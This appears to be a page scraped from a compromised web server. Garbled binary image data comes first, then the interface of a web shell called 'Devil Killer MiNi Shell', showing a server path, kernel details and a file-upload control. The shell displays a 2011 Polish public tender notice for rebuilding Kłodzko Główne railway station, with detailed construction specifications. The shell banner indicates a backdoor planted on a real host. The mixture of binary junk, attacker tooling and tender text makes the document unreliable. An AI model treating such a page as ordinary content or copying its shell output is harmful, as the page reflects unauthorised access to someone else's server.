JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111227/344969-N-2011.html

<p class="kh_header"><b>Wrocław: Wykonanie robót budowlano - montażowych dla projektu pn. Przebudowa dworca kolejowego Kłodzko Główne</b><br>
<b>Numer ogłoszenia: 344969 - 2011; data zamieszczenia: 27.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> PKP Spółka Akcyjna Oddział Gospodarowania Nieruchomościami we Wrocławiu , ul. Joannitów 13, 50-525 Wrocław, woj. dolnośląskie, tel. 071 717 13 33, faks 071 717 54 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> nz.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlano - montażowych dla projektu pn. Przebudowa dworca kolejowego Kłodzko Główne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlano-montażowych dla projektu pn. Przebudowa dworca kolejowego Kłodzko Główne
Przedmiot zamówienia jest   zadaniem inwestycyjnym o  terminie realizacji do 30.10.2012r. 

Okres rękojmi wynosi 36 miesięcy dla projektu i jest liczony od dnia  odbioru końcowego.  

ROZWIĄZANIA KONSTRUKCYJNE, OGÓLNOBUDOWLANE I MATERIAŁOWE- STAN ISTNIEJĄCY 

1. FUNDAMENTY 
Ławy fundamentowe ceglane. Budynek nie posiada widocznych pęknięć, ani rozwarstwień spowodowanych osiadaniem lub spękaniem fundamentów, co wskazuje na prawidłową pracę fundamentów przekazujących obciążenie na grunt. 

2. ŚCIANY PIWNIC 
Ściany piwnic z cegły pełnej gr.64cm oraz 38 i 25 cm. Konstrukcyjnie nie wykazują wyboczeń ani pęknięć. 
Wyprawy tynkarskie ścian piwnic posiadają braki i są częściowo odspojone. Odspojenia należy usunąć. Następnie wykonać nowe wyprawy. Na ścianach piwnic od zewnątrz należy wykonać izolację przeciwwilgociową. 

3. STROPY 
Stropy pośrednie budynku o konstrukcji drewnianej oraz stalowo-ceramiczne. Stan techniczny stropów budynku ocenia się jako dobry. 

4. ŚCIANY CZĘŚCI NADZIEMNEJ 
Ściany części nadziemnej murowane z cegły pełnej o zróżnicowanej grubości 25-51cm, zewnętrzne jednostronnie otynkowane (od wewnątrz). Ściany nie wykazują zarysowań ani spękań. Ich stan techniczny jest dobry. Spękane fragmenty ściany ażurowej przy schodach wejściowych należy rozebrać i przemurować. 

5. KOMINY I PRZEWODY KOMINOWE 
Murowane z cegły pełnej w dobrym stanie technicznym. Uszkodzone korony kominów i murków rozebrać i wymurować nowe, doprowadzić do wymogów normowych. 

6. ŚCIANKI DZIAŁOWE 
Ścianki działowe z cegły pełnej obustronnie tynkowane. W dobrym stanie technicznym.

7. KLATKI SCHODOWE 
Schody o konstrukcji drewnianej w dobrym stanie technicznym. Należy dokonać remontu biegów schodowych i balustrad. Usunąć stare powłoki malarskie i nałożyć nowe. 
Schody do piwnicy zaopatrzyć w poręcz, uzupełnić stopnie. 

8. DACH 
Dachy dwuspadowe pokryte papą o konstrukcji drewnianej w złym stanie technicznym. Należy dokonać wymiany pokrycia dachowego (papy), skorodowanych elementów drewnianych: deskowania i belek konstrukcyjnych oraz wykonać nowe obróbki blacharskie z blachy tytanowo-cynkowej. 
Elementy drewniane należy zaimpregnować przeciwpożarowo, przeciw owadom i grzybom do cech NPO. 

9. WYKOŃCZENIE OBIEKTU - ELEWACJE 
Elewacje ceglane budynku są w dobrym stanie technicznym. Jednak widoczne są liczne ubytki w cegłach oraz graffiti. Należy usunąć graffiti na elewacjach oraz uzupełnić ubytki cegieł i spoin. Ściany zabezpieczyć specjalnym środkiem antygraffitowym. 
Ponadto, by zapobiec ponownego wymywania cegieł w cokole budynku, należy odtworzyć opaskę ze spadkiem, wokół budynku. 
W związku ze złym stanem technicznym, należy wymienić stolarkę okienną i drzwiową. Należy zwrócić szczególną uwagę na odtworzenie detalu na ramach okiennych oraz na drzwiach. 
Wszelkie wiszące na elewacjach kable należy usunąć. Należy wymienić tablice informacyjne dworcowe. Tablice kolejowe oraz wszelkie szyldy należy montować na kotwach dystansowych zabezpieczonych antykorozyjnie. Kotwy i mocowania należy dobierać tak, aby oddalenie od powierzchni ściany było minimalne 

ROZWIĄZANIA PRAC ADAPTACYJNYCH 

1. ŚCIANY 

ŚCIANY ZEWNĘTRZNE pozostawić bez większych ingerencji. Należy zdemontować wszelkie zbędne elementy na elewacji oraz kraty w oknach. Planuje się uzupełnienie ubytków w cegłach. 
Remont ścian elewacji: 
usunięcie istniejących graffiti np. środkiem. AGS 2+ producent TRION TENSID AB. Środek stosować zgodnie z zaleceniami producenta. Jeżeli po spłukaniu środka widoczne są jeszcze /grube/ nawarstwienia farby, czynność należy powtórzyć, pamiętając o tym, aby powierzchnia nieco wyschła przed kolejną aplikacją środka AGS 2+. Po usunięcieu nawarstwień farby w aerozolu często pozostają na powierzchni drobne resztki mikro cząsteczek farby, głęboko osadzonych w materiale. Do ich usunięcia służy preparat AGS 60 Trion Tendesid AB. Użyć zgodnie z zaleceniami producenta. Jeżeli nie udało się usunąć zabrudzenia za pierwszym razem, czynność należy powtarzać do skutku, wydłużając czas kontaktu środka z powierzchnią nawet do 60 minut. 
Usunięcie farby z pilastrów,parapetów, płycin pod oknami i z cegły klinkierowej 
Czyszczenie wątku ceglanego metodą chemiczną. Do czyszczenia powierzchni cegieł metodą chemiczną należy użyć środka np. Alkutex Fassadenreiniger Paste (Remmers Polska Sp. zoo) zuż. Ok. 0,3 kg/m2. Zastosować zgodnie z zaleceniami producenta. 
Naprawa uszkodzonych elementów ściany. Należy usunąć spoiny na gł. 1,5 cm. Następnie ponownie nałożyć spoinę fugą trasową np. Funcosil Fugenmortel (Remmers Polska Sp. zoo ) w dobranym kolorze zuż, wg potrzeb. Jeżeli konieczne okaże się miejscowe scalenie kolorystyczne cegły, należy wykonać lazurę mieszaniną produktów: Funcosil LA Siliconfarbe farblos (bezbarwna) 50% oraz Funcosil WS (Remmers Polska Sp. zoo) - 50% i zaimpregnować w odpowiednim kolorze. 
Uzupełnić ubytki w cegłach. Naprawę polegającą na uzupełnieniu ubytków cegieł można wykonać dopiero po zabezpieczeniu uszkodzonego muru przed dalszym nawilgacaniem oraz jego odsoleniu, np. metodą transportu do otwartego środowiska. Po tych zabiegach należy skuć uszkodzone fragmenty cegieł lub oczyścić powierzchnię muru za pomocą piaskowania albo hydropiaskowania oraz usunąć spoiny miedzy cegłami. Jeżeli wielkość ubytków w cegle przekracza objętość ? jej wymiaru, należy ją raczej wymienić niż odbudowywać za pomocą zapraw naprawczych. W pozostałych przypadkach, reprofilację cegieł można przeprowadzić przy użyciu zaprawy typu Ceresit CR 43. 
Zabezpieczenie powierzchni przed graffiti do wysokości 2 m - środek antygraffitowy firmy KOENT. Stosować zgodnie z zaleceniami producenta. Podstawową zasadą w tworzeniu powłoki zabezpieczającej przed graffiti jest /wybudowanie/ jej na zewnątrz materiału. Zabezpieczenie może być nakładane na powierzchnię, która została wcześniej zaimpregnowana środkiem hydrofobizującym. Wpływa to na zmniejszenie zużycia materiału. 
Czyszczenie i impregnacja elementów kamiennych (piaskowiec) i uzupełnienie ubytków 
Piaskowanie i hydropiaskowanie niskociśnieniowe oraz oczyszczanie elementów kamiennych na elewacji. 
Dzięki niskociśnieniowej technologii piaskowania JOS oraz Remmers Rotec( regulacja ciśnienia od 0,1 bara ) nie następuje uszkodzenie powierzchni elementu obrabianego np. ornamenty, figury czy elementy dekoracyjne,oczyszczanie ma charakter delikatnego usuwania powstałych zabrudzeń. 

UWAGA: 
Na materiałach bardzo chłonnych odstęp 24 godzin pomiędzy pierwszą warstwą a następnymi warstwami. Po okresie 24 godzin pierwsza warstwa ulega wstępnemu utwardzeniu, stanowiąc fundament pod budowę kolejnych warstw, które nie przenikają w głąb materiału. Ściekające nadwyżki preparatu należy wyrównać pędzlem przed ich wyschnięciem. 

UWAGA: 
Przy uzupełnianiu cegieł na gzymsach należy bezwzględnie zachować przekrój gzymsów. 
Zmiany w stosunku do projektu zatwierdzonego decyzją I-K/Z/146/08: Projektuje się docieplenie ścian budynku dworca od wewnątrz systemem płyt klimatycznych według obliczeń znajdujących się w opracowaniu. Całość wyrównać gładzią gipsową i pomalować. 

Dobór grubości płyty klimatycznej w zależności od grubości ścian budynku. 

Wartość współczynnika U W/m2K Grubość muru ceglanego mm	Grubość płyty klimatycznej	Współczynnik U 
(W/Km2)
600	30mm	0,76
530-560	120mm	0,36
400-430	140mm	0,33

ŚCIANY WEWNĘTRZNE 
Przewiduje się miejscowe zamurowania otworów, wykucia nowych oraz miejscowe wyburzenia ścianek działowych i postawienie nowych. 
Należy usunąć z powierzchni ścian i sufitów luźne elementy tynkarskie oraz powłoki malarskie. Farbę olejna należy usunąć za pomocą środka chemicznego np. Fargborttagning firmy Beckers. Sposób użycia zgodnie z zaleceniami producenta. Ubytki wypraw tynkarskich należy uzupełnić zaprawą cementowo-wapienną. Następnie należy zagruntować wyprawy tynkarskie preparatem gruntującym np. Keim Ecosil (dwukrotne malowanie). 
Ściany w piwnicy należy wyczyścić ze starych powłok malarskich oraz tynków. Następnie usunąć spoinę na głębokość ca 1,5 cm. Usunięte spoiny uzupełnić masą do spoinowania cegły i uzupełnić ubytki w cegle. Ściany otynkować, zagruntować i pomalować farbą. 
Przewiduje się docieplenie ściany od wewnątrz systemem płyt klimatycznych według obliczeń znajdujących się w opracowaniu. 

ŚCIANKI DZIAŁOWE 
Przy zmianie funkcji użytkowej przekucia przez ściany istniejące i mury całkowicie przeznaczone do wyburzenia (są zaznaczone na rzutach poszczególnych kondygnacji) nie wpływają na układ statyczny całego budynku. Przewiduje się ścianki działowe z płyt GK . 

2. DACHY 
Należy dokonać naprawy lub wymiany skorodowanych elementów drewnianych stropu poddasza, by odtworzyć układ statyczny więźby dachowej. 
Prace remontowe: 
rozebrać uszkodzone korony kominów i murków 
wykonać nowe korony kominów oraz przemurować murki za pomocą cegły klinkierowej zdemontować obróbki blacharskie, rynny i rury spustowe 
zerwać warstwy pokrycia dachowego (papy) 
w przypadku stwierdzenia korozji deskowania oraz elementów konstrukcyjnych dachu należy je wymienić. Odtworzyć więźbę dachową 
wszystkie elementy dachu należy zaimpregnować przeciwpożarowo, przeciw owadom i grzybom do cech NPO. W tym celu należy oczyścić drewno z zanieczyszczeń i usunąć istniejące powłoki malarskie środkiem typu: Epifanes Paint Remover firmy Nobiles. 
Elementy drewniane widoczne na zewnątrz budynku pomalować lakierobejcą np., firmy Sopur na kolor wg wzornika ISPO 250/30 (RAL 8025) 
Dach docieplić od wewnątrz wełną mineralną grubości 20cm tylko nad klatkami schodowymi. Pod wełnę należy ułożyć folię PE. od wewnątrz wykonać podbitkę 
wymienić papy na dachu na papę termozgrzewalną wykonaną dwukrotnie. 
Zamontować nowe obróbki blacharskie 
Zamontować rynny i rury spustowe 

Ponadto przewiduje się wykucia pod przejścia instalacyjne i kominy wentylacyjne przez istniejące stropy w części parterowej budynku. Rynny wraz z rurami spustowymi wymienić na nowe z blachy tytanowo-cynkowej oraz zamontować brakujące wokół parterowej części komercyjnej. 

3. STROPY 
Pod stropami w pomieszczeniach sanitarnych oraz w komunikacji przewiduje się sufity podwieszone kasetonowe. Uwaga: Wysokość pomieszczeń musi spełniać warunki jakim powinny odpowiadać budynki i ich usytuowanie dz. Ustaw nr 75. 
Należy wykonać montaż zgodnie z zaleceniami producenta. Po zamontowaniu sufitu i wykonaniu nowej posadzki musi pozostać przestrzeń w świetle tych elementów minimum 300 cm. 
W korytarzach, łazienkach, pomieszczeniach administracyjnych (przeznaczonych dla 4 lub mniej osób), socjalnych - sufit podwieszony kasetonowy w kolorze białym, pustka powietrzna min. 40 cm. 

4. POSADZKI NA GRUNCIE 
Należy dokonać demontażu istniejących warstw posadzek: 
wykończenie szlichta cementowa 5cm - skucie 
Następnie należy ułożyć następujące warstwy: 
wykończenie 1cm- płytki gresowe/ wykładzina PCV/ posadzka betonowa/płyty kanienne 
jastrych cementowy 5 cm 
izolacja przeciwwodna 
istniejąca warstwa konstrukcyjna 

UWAGA: 
Poziomy nowych posadzek muszą być takie same jak istniejących. 

5. FUNDAMENTY 
Przebudowa wnętrza budynku nie wpływa na dodatkowe dociążenie fundamentów, co miałoby wpływ na pracę ogólną konstrukcji posadowienia w budynku. 

6. STOLARKA 
Stolarka okienna. Zgodnie z wymogami konserwatorskimi należy przywrócić stolarkę okienną i drzwiową zewnętrzną do stanu pierwotnego. Stolarka drewniana z drewna klejonego. 
Materiał: dąb, 
Konstrukcja: 
Okna jednoramowe z drewna klejonego na długość oraz warstwowo na grubość (z mikrowczepami), Współczynnik przenikania ciepła dla całego okna (Uw) wynosi 1,35-1,45 W/m2K. 
Okucia - obwiedniowe z mikrouchylaniem i zaczepem antywłamaniowym w oknach ze skrzydłem uchylno-rozwieranym (UR) - rozwierane w oknach ze skrzydłem rozwieranym (R) - uchylne w oknach ze skrzydłem uchylnym (U) - zamykacz HAU TAU umożliwiający uchylanie górnego skrzydła z poziomu podłogi (UZ) 
Wykończenie: 
Farby wodorozcieńczalne: 
kolor ISPO 340/10 (RAL zbliżony do 8007) 
Szyby
Zestawy 2-szybowe ze szkłem niskoemisyjnym z przestrzenią międzyszybową wypełnioną argonem. Współczynnik przenikania ciepła Us = 1.0 W/m2K, izolacyjność akustyczna Rw = 32dB. 
Wyposażenie: 
klamka, mikrouchylanie, zaczep antywłamaniowy, termookapnik i okapnik osłaniający dolny ramiak skrzydła okiennego, nawiewniki higrostyrowane typu Aereco 1 na 1 okno, 

UWAGA: 
Elementy stolarki i ślusarki okiennej i drzwiowej oraz szkleń należy zamawiać i wykonywać / montować na podstawie zweryfikowanych obmiarów rzeczywistych wykonanych na obiekcie. 

W budynku dworca zamontować parapety z konglomeratu. W poczekalni zamontować typu VERDE TIRRENO firmy Kagran. Reszta pomieszczeń parapety z konglomeratu typu AFION firmy Kagran. 
Okna kasowe wyposażyć w roletę zewnętrzną antywłamaniową zagłębioną w murze w kolorze zbliżonym do koloru sciany. Zamontować szybę antywłamaniową na profilach zimnych zgodnie z zestawieniem stolarki. Okna wyposażone w rygiel blokujący okno na różnych wysokościach. 
Blat z granitu typu VERDE TIRRENO firmy kagran, na wys. 90cm, wychodzący po 3 cm za obrys okna, od strony kasjerki na 5 cm poza lico ściany, od strony pasażerów na 15 cm. 
Stolarka drzwiowa wewnętrzna nowa. 
Stolarka drzwiowa zewnętrzna w kolorze wg wzornika ISPO 340/10 (RAL zbliżony do 7031)  
Wymienić szklenia na nowe zgodnie z zestawieniem stolarki drzwiowej. Wybrane drzwi zewnętrzne wymienić na nowe dostosowując do obowiązujących przepisów (zgodnie z zestawieniem stolarki). Wymienić szklenia w doświetlach. 
Na narożach otworów drzwiowych wejściowych oraz do poczekalni, projektuje się zamontowanie kątowników z PCV jako osłona przed uderzeniami. 
Drzwi do sanitariatów dla podróżnych zgodnie z zestawieniem stolarki wyposażyć w systemy wrzutowe. 

6. KLATKA SCHODOWA 
Przebudowa drewnianych klatek schodowych obejmuje wykonanie nowych biegów schodowych i spoczników żelbetowych. Stopnie należy wyłożyć drewnem o zwiększonej odporności ogniowej. Balustrady istniejące zdemontować i wykonać ich renowację (oczyszczanie z powłok malarskich, odtworzenie brakujących rzeźbionych tralek na wzór istniejących). 
Należy wykonać wyprawy tynkarskie i malarskie (farby zmywalne). 
Wszelkie instalacje biegnące po ścianach, schować w bruzdach. Należy zainstalować nowe oświetlenie klatki schodowej zgodnie z projektem elektrycznym. 
Remont schodów do piwnicy będzie polegać na uzupełnieniu ubytków w stopniach i wykonanie wykończenia z płytek gresowych. 

7. INSTALACJE SANITARNE 
1. Instalacja wodociągowa. 
Budynek wyposażony jest w instalację wody zimnej i ciepłej. Ciepła woda użytkowa przygotowywana jest miejscowo w elektrycznych pojemnościowych podgrzewaczach ciepłej wody. Instalacja wodociągowa zasilana jest z własnego ujęcia wody. 
W związku ze złym stanem technicznym istniejącej instalacji oraz w wyniku przebudowy pomieszczeń istniejącą instalację wodociągową wraz z bateriami i punktami czerpalnymi należy zdemontować. Demontaż wykonany będzie bez odzysku elementów. Zdemontowane przewody oraz baterie i punkty czerpalne należy po wcześniejszym uzgodnieniu wywieź na wysypisko odpadów, części metalowe do składnicy złomu lub zmagazynować w miejscu wskazanym przez Inwestora. 
Parametry fizykochemiczne wody dostarczanej z własnego ujęcia są niewystarczające, w związku z powyższym projektuje się zmianę źródła zasilanie instalacji wodociągowej. 
Instalacja wodociągowa będzie zasilana z istniejącej w ulicy Zamkowej sieci wodociągowej O100 mm poprzez projektowane przyłącze. Włączenia dokonać przy pomocy trójnika. 

2. Wewnętrzna instalacja kanalizacji sanitarnej i deszczowej 
Ścieki socjalno-bytowe z budynku oraz ścieki deszczowe odprowadzane są do sieci kanalizacyjnej O300 mm poprzez istniejące przyłącza. W związku z ich złym stanem technicznym należy wykonać nowe przyłącze a istniejące należy zdemontować. 

3. Instalacja centralnego ogrzewania. 
Budynek zlokalizowany jest w III strefie klimatycznej, dla której przyjmuje się obliczeniową temperaturę zewnętrzną -20 oC. 
Obecnie źródłem ciepła w budynku jest kotłownia na paliwo stałe. W związku ze złym stanem technicznym istniejącej instalacji oraz w wyniku przebudowy pomieszczeń istniejącą instalację wraz z grzejnikami i armaturą należy zdemontować. Demontaż wykonany będzie bez odzysku elementów. Zdemontowane przewody oraz grzejniki należy po wcześniejszym uzgodnieniu wywieź na wysypisko odpadów, części metalowe do składnicy złomu lub zmagazynować w miejscu wskazanym przez Inwestora. 
W budynku zaprojektowano ogrzewanie grzejnikowe. Instalacja c.o. wodna, pompowa, dwururowa. Temperatura zasilanie / powrót wynosi 80/60 oC. Instalacja zasilana będzie z kotła olejowego Vitorand 200 o mocy 195 KW prod. Viessmann, zlokalizowanych w kotłowni w piwnicy budynku. Dodatkowa przy wejściach głównych do budynku należy zamontować kurtyny powietrzne - wielkości oraz rozmieszczenie zostało przedstawione na rzutach. 

8. INSTALACJE ELEKTRYCZNE 
ZASILANIE OBIEKTU 
Budynek dworca kolejowego posiada istniejące zasilanie które nie podlega modernizacji. Istniejące złącze kablowe należy zabezpieczyć na czas prowadzenia prac remontowych przed uszkodzeniem. Projekt nie zmienia parametrów istniejącego zasilania pod względem rodzaju kabla zasilającego, zabezpieczenia głównego oraz parametrów bilansu mocy szczytowej dla obiektu. Przejścia przez ściany oddzielenia pożarowego wypełnić masą ognioodporną typu HILTI. 

GŁÓWNY WYŁĄCZNIK PRĄDU 
Funkcję głównego wyłącznika prądu realizować będzie wyłącznik typu DPX 160 z nastawą 100A. Wyłącznik zainstalowany będzie w projektowanej rozdzielni głównej RG. Wyłącznik wyposażony będzie w wyzwalacz wzrostowy umożliwiający podłączenie zdalnych przycisków wyłączenia awaryjnego. Przyciski wyłączenia awaryjnego instalować przy wyjściach głównych z budynku w miejscach określonych na poszczególnych rzutach budynku. Stosować przyciski instalowane w puszkach natynkowych typu /zbij szybkę/. Wyłączniki instalować na wysokości 1,3m licząc od powierzchni posadzki. Do przycisku awaryjnego doprowadzić sygnał sterujący za pośrednictwem przewodu HDGS 3x1,5mm2. Przy pomocy przycisku wyłącznika awaryjnego odłączona będzie cała instalacja elektryczna budynku. 

Po wykonaniu prac budowlanych należy bezwzględnie sprawdzić poprawność działania systemu awaryjnego odłączania instalacji elektrycznej. 

9. WYKOŃCZENIE 
PODŁOGI 
Podłogi wykonać z materiałów umożliwiających ich mycie i dezynfekcję. 
Pomieszczenia administracyjne - wykładzina PCV typu Tarkett Granit NCS S 2505-B 
Klatka schodowa - wykończenie drewno o zwiększonej odporności ogniowej 
w piwnicy płytki gresowe 
Hole - płytki gresowe 

ŚCIANY 
Wykończenie ścian malowanych w pomieszczeniach: 
administracyjnych: ściany pokryte farbą akrylową zmywalną w kolorze ze wzornika sto 31313 sufity pokryte farbą emulsyjną w kolorze białym. 
Klatka schodowa - farbą olejną matową do wysokości sufitu w kolorze wg wzornika sto 31140 , sufity pokryte farbą emulsyjną w kolorze białym, balustrada malowana lakierobejcą w ciemnym kolorze drewna 
Hole - ściany pomalować farbą akrylową zmywalną w kolorze ze wzornika sto 33302 
Wykończenie ścian w pomieszczeniu kotłowni - farba olejną matową do sufitu w kolorze RAL 7047 
Wykończenie ścian w pomieszczeniach gospodarczych - farba olejną matową sufitu ca 3,00 m w kolorze białym. 
Ściany poczekalni pomalować farbą olejną matową do wysokości 2,10 m w kolorze wg wzornika sto 31301 . Do wysokości 2 m zabezpieczyć ściany środkiem antygraffitowym typu: środek antygraffitowy firmy KOENT. Powyżej malować emulsją akrylową w kolorze w kolorze sto 31305. Sufit pomalować farbą emulsyjną w kolorze białym. 
Wykończenie ścian w sanitariatach: 
sanitariaty dla podróżnych - płytki ceramiczne ścienne(gat. I) do górnej wysokości drzwi H=210 typu Opoczno Hyperion 29,9x29,9 cm. Sanitariat męski ściany: szary H9 i niebieski H8, podłogi grafit H10, Sanitariat damski i NP. podłogi szary H9, ściany krem H3 i beż H4 
płytki ceramiczne ścienne mocowane na klej wodoodporny, elastyczny płytki wielkości 29,9x29,9 cm szczelina na fugę 0,3 cm 
sanitariaty socjalne - podłoga ścieralność 3-4, odporność na ścieranie R9, ściany - płytki typu Opoczno Hyperion 29,9x29,9 cm. Sanitariat ściany: krem H3, podłogi szary H9 
WYKOŃCZENIE GLAZURY LISTWAMI - NAROŻA ŚCIANEK, MOCOWANIE PŁYTEK NA KLEJ WODOODPORNY, ELASTYCZNY 

10. WYPOSAŻENIE 
Przewidziano kurtyny powietrzne nad wejściami do budynku dworca. W poczekalni umieszczono ławki typu: ZANO, ławka Sofa 2300 oraz 3 automaty na bilety i kosze na śmieci. 
Na ścianach montować tabliczki informacyjne zgodnie z projektem. Tablice kolejowe oraz wszelkie szyldy należy montować na kotwach dystansowych zabezpieczonych antykorozyjnie. 
Kotwy i mocowania należy dobierać tak, aby oddalenie od powierzchni ściany było minimalne 
W przypadku zatrudnienia osób niepełnosprawnych przewiduje się zakupienie schodołazu pozwalającemu osobom na wózkach dostać się na piętro. 

11. WENTYLACJA 
Przewiduje się pozostawienie wentylacji grawitacyjnej jako przewodniej. Planuje się wymianę wszystkich kratek. Nowe kanały wykonać z blachy ocynkowanej. W poszczególnych pomieszczeniach projektuje się wentylatory systemowe. Przewidziano również wentylację mechaniczną jako wspomagającą - wg opracowania projektu instalacji sanitarnych. 
W parterowej części komercyjnej należy wykonać nowe kominy. 

12. WYKOŃCZENIE ZEWNĘTRZNE 
Zabezpieczyć środkiem antygraffitowym do wysokości 2 m. Istniejące parapety z cegły ceramicznej oczyścić, uzupełnić ubytki. Przewiduje się wymianę wszystkich obróbek blacharskich i kominowych oraz instalację odgromową. 

13. IZOLACJE PRZECIWWODNE 
Zakłada się wykonanie się nowej izolacji przeciwwodnej dla całego budynku. 
W miejscach gdzie nie jest możliwe odkopanie fundamentów należy zastosować izolację zewnętrzną przez iniekcję wewnętrzną. 
Ściany zewnętrzne należy zaimpregnować hydrobowo do wysokości ok. 50cm nad terenem. 
Należy wykonać wokół budynku wykop w celu wykonania pionowej izolacji przeciwwodnej, dodatkowo zastosować folię kubełkową. Prace prowadzić odcinkowo. 

UWAGI
